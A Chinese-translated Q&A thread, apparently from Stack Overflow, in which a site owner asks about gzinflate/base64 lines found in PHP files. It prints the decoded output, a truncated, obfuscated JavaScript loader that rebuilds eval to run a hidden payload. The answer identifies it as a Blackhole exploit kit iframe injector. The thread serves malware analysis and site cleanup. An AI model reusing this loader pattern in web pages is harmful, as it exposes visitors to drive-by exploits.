我在各种.php文件中发现了echo(gzinflate(base64_decode(".....")的几种情况,我很好奇它的确切作用。我想我使用base64 -d < fileetje.b64 > fileetje.gz解码了引号中的文本,其中fileetje.b64包含字符串数据。但是,当我随后尝试压缩fileetje.gz时,它报告了错误的数据。另外,在执行file fileetje.gz时,它会显示data,我希望在GZIP的数据中可以看到类似的内容。

如何从Linux命令行解密数据?

http://www.base64online.com/这样的在线解码器也无法理解代码。将字符串数据添加到问题中也安全吗?

更新:我即兴创作了一个php脚本,因为它只是一个简单的回显(Thnx:glglgl)。结果是这样的:

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48...............

它的结尾是:
...........9~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=563;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>

最佳答案

嵌入式javascript遵循“黑洞漏洞利用”工具包的格式。它注入(inject)了一个iFrame,将您引向漏洞利用,这可能是个坏消息。认为echo()(如上所述,在评论中)将是安全的,这是不正确的。该功能只是将嵌入的恶意软件代码放到您的页面中以造成损害。

相关SO帖子:
My wordpress site was hacked, anyone tell what this code does?

关于如何工作的帖子:What is the purpose of this JavaScript hack?

相关信息:

http://johnbatchelorshow.com/jb/2012/01/lessons-learned-from-the-hacking-black-hole-exploit-kit/

http://nakedsecurity.sophos.com/2012/03/29/exploring-the-blackhole-exploit-kit/

07-26 04:24